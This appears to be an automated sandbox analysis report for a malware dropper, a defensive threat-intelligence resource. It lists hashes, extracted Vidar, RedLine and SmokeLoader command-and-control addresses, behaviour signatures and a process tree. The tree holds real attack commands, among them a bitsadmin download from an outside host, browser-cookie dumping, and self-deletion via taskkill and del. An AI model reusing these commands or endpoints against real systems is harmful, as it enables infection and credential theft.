Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    135s
  • max time network
    1820s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    01-08-2021 23:12

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

redline

Botnet

abobi isid

C2

209.250.247.73:64156

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

forinstalls

C2

77.220.213.35:52349

Extracted

Family

redline

Botnet

30_7_rz

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

5k_BLACK_HOLE

C2

45.14.49.117:14251

Extracted

Family

vidar

Version

39.8

Botnet

937

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2760
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2672
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1944
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1332
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1240
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:412
                      • C:\Users\Admin\AppData\Roaming\uahatfe
                        C:\Users\Admin\AppData\Roaming\uahatfe
                        2⤵
                          PID:4388
                          • C:\Users\Admin\AppData\Roaming\uahatfe
                            C:\Users\Admin\AppData\Roaming\uahatfe
                            3⤵
                              PID:3784
                          • C:\Users\Admin\AppData\Roaming\bhhatfe
                            C:\Users\Admin\AppData\Roaming\bhhatfe
                            2⤵
                              PID:4072
                            • C:\Users\Admin\AppData\Roaming\uahatfe
                              C:\Users\Admin\AppData\Roaming\uahatfe
                              2⤵
                                PID:5448
                                • C:\Users\Admin\AppData\Roaming\uahatfe
                                  C:\Users\Admin\AppData\Roaming\uahatfe
                                  3⤵
                                    PID:68
                                • C:\Users\Admin\AppData\Roaming\bhhatfe
                                  C:\Users\Admin\AppData\Roaming\bhhatfe
                                  2⤵
                                    PID:5340
                                  • C:\Users\Admin\AppData\Roaming\uahatfe
                                    C:\Users\Admin\AppData\Roaming\uahatfe
                                    2⤵
                                      PID:3000
                                    • C:\Users\Admin\AppData\Roaming\bhhatfe
                                      C:\Users\Admin\AppData\Roaming\bhhatfe
                                      2⤵
                                        PID:4088
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                      1⤵
                                        PID:68
                                      • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                                        "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                                        1⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3876
                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2160
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\setup_install.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7zS0787B454\setup_install.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of WriteProcessMemory
                                            PID:3756
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3560
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_1.exe
                                                sonia_1.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of WriteProcessMemory
                                                PID:3792
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_1.exe" -a
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:1936
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3900
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_2.exe
                                                sonia_2.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:3772
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1272
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_3.exe
                                                sonia_3.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Modifies system certificate store
                                                PID:1208
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 932
                                                  6⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4824
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4036
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_4.exe
                                                sonia_4.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2080
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sonia_5.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1020
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_5.exe
                                                sonia_5.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:904
                                                • C:\Users\Admin\Documents\ZfvxC0GHMuf51jOdkxaZTX4v.exe
                                                  "C:\Users\Admin\Documents\ZfvxC0GHMuf51jOdkxaZTX4v.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4864
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3540
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:2444
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:5516
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:5480
                                                      • C:\Users\Admin\Documents\_vzdlhJI_lGkgasDjFRc0PvO.exe
                                                        "C:\Users\Admin\Documents\_vzdlhJI_lGkgasDjFRc0PvO.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4852
                                                      • C:\Users\Admin\Documents\kTLOsZcPqudGKcIjqN2IyRJn.exe
                                                        "C:\Users\Admin\Documents\kTLOsZcPqudGKcIjqN2IyRJn.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4840
                                                      • C:\Users\Admin\Documents\sf8AnFMqgV8WaauN2JGcgSfb.exe
                                                        "C:\Users\Admin\Documents\sf8AnFMqgV8WaauN2JGcgSfb.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4972
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:496
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5040
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:6092
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5644
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4948
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4724
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2837.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5548
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Download via BitsAdmin
                                                                      PID:4448
                                                                  • C:\Users\Admin\Documents\GDbM_n42GnbCHXQ0SR0RPM1S.exe
                                                                    "C:\Users\Admin\Documents\GDbM_n42GnbCHXQ0SR0RPM1S.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:4952
                                                                  • C:\Users\Admin\Documents\DTtgb3hSVcvV77z8i54aCVgo.exe
                                                                    "C:\Users\Admin\Documents\DTtgb3hSVcvV77z8i54aCVgo.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4900
                                                                    • C:\Users\Admin\Documents\DTtgb3hSVcvV77z8i54aCVgo.exe
                                                                      C:\Users\Admin\Documents\DTtgb3hSVcvV77z8i54aCVgo.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:196
                                                                  • C:\Users\Admin\Documents\HSefpO_tlyFq5LdW4DeNCxLR.exe
                                                                    "C:\Users\Admin\Documents\HSefpO_tlyFq5LdW4DeNCxLR.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4892
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:2084
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:4084
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:5524
                                                                        • C:\Users\Admin\Documents\5hBiwhaZEZYpj1sLePhCouOm.exe
                                                                          "C:\Users\Admin\Documents\5hBiwhaZEZYpj1sLePhCouOm.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4944
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                            7⤵
                                                                              PID:5956
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im chrome.exe
                                                                                8⤵
                                                                                • Kills process with taskkill
                                                                                PID:5168
                                                                          • C:\Users\Admin\Documents\1ra8VX_czp7F9hFknoqLA1rc.exe
                                                                            "C:\Users\Admin\Documents\1ra8VX_czp7F9hFknoqLA1rc.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4904
                                                                          • C:\Users\Admin\Documents\8UaB43_5qpOc7mSfZiPnU7Bc.exe
                                                                            "C:\Users\Admin\Documents\8UaB43_5qpOc7mSfZiPnU7Bc.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3780
                                                                          • C:\Users\Admin\Documents\0T7ZCmoM1jtJuezXP7N6cmrf.exe
                                                                            "C:\Users\Admin\Documents\0T7ZCmoM1jtJuezXP7N6cmrf.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:4288
                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4556
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:5604
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                  8⤵
                                                                                    PID:5636
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:6036
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                      8⤵
                                                                                        PID:6088
                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1040
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                          PID:4100
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          8⤵
                                                                                            PID:5692
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                              PID:2660
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                                PID:2540
                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4628
                                                                                          • C:\Users\Admin\Documents\FmePxsLP3p2sFb4qOz9S9XPq.exe
                                                                                            "C:\Users\Admin\Documents\FmePxsLP3p2sFb4qOz9S9XPq.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4260
                                                                                            • C:\Users\Admin\Documents\FmePxsLP3p2sFb4qOz9S9XPq.exe
                                                                                              "C:\Users\Admin\Documents\FmePxsLP3p2sFb4qOz9S9XPq.exe"
                                                                                              7⤵
                                                                                                PID:3680
                                                                                            • C:\Users\Admin\Documents\yCYtRHBsvF96cTJ_l8Iv5Ugv.exe
                                                                                              "C:\Users\Admin\Documents\yCYtRHBsvF96cTJ_l8Iv5Ugv.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4208
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 660
                                                                                                7⤵
                                                                                                • Program crash
                                                                                                PID:4596
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 676
                                                                                                7⤵
                                                                                                • Program crash
                                                                                                PID:2444
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 684
                                                                                                7⤵
                                                                                                • Program crash
                                                                                                PID:1312
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 676
                                                                                                7⤵
                                                                                                • Program crash
                                                                                                PID:4652
                                                                                            • C:\Users\Admin\Documents\Jm79k_lNkH5TiqRYsvO4rhSM.exe
                                                                                              "C:\Users\Admin\Documents\Jm79k_lNkH5TiqRYsvO4rhSM.exe"
                                                                                              6⤵
                                                                                                PID:496
                                                                                                • C:\Users\Admin\Documents\Jm79k_lNkH5TiqRYsvO4rhSM.exe
                                                                                                  C:\Users\Admin\Documents\Jm79k_lNkH5TiqRYsvO4rhSM.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4452
                                                                                              • C:\Users\Admin\Documents\SKnZrIy96MQ4dwl14qmYocWv.exe
                                                                                                "C:\Users\Admin\Documents\SKnZrIy96MQ4dwl14qmYocWv.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4140
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 660
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:2084
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 676
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:804
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 684
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:4632
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 668
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:2448
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1080
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:4436
                                                                                              • C:\Users\Admin\Documents\VZyv0134jRnyOVwLcYfu4aGf.exe
                                                                                                "C:\Users\Admin\Documents\VZyv0134jRnyOVwLcYfu4aGf.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5044
                                                                                              • C:\Users\Admin\Documents\7r6mRgebR5G1e2_oyu10EkqY.exe
                                                                                                "C:\Users\Admin\Documents\7r6mRgebR5G1e2_oyu10EkqY.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5032
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 7r6mRgebR5G1e2_oyu10EkqY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7r6mRgebR5G1e2_oyu10EkqY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                  7⤵
                                                                                                    PID:5676
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im 7r6mRgebR5G1e2_oyu10EkqY.exe /f
                                                                                                      8⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5908
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /t 6
                                                                                                      8⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:5784
                                                                                                • C:\Users\Admin\Documents\bGuWcRu7NS4TFuEl57WZZmGe.exe
                                                                                                  "C:\Users\Admin\Documents\bGuWcRu7NS4TFuEl57WZZmGe.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4996
                                                                                                  • C:\Users\Admin\Documents\bGuWcRu7NS4TFuEl57WZZmGe.exe
                                                                                                    "C:\Users\Admin\Documents\bGuWcRu7NS4TFuEl57WZZmGe.exe"
                                                                                                    7⤵
                                                                                                      PID:640
                                                                                                  • C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe
                                                                                                    "C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2116
                                                                                                    • C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe
                                                                                                      "C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe"
                                                                                                      7⤵
                                                                                                        PID:5900
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                          8⤵
                                                                                                            PID:4192
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                              9⤵
                                                                                                                PID:5884
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5884.0.1317508320\1414519661" -parentBuildID 20200403170909 -prefsHandle 1524 -prefMapHandle 1516 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5884 "\\.\pipe\gecko-crash-server-pipe.5884" 1624 gpu
                                                                                                                  10⤵
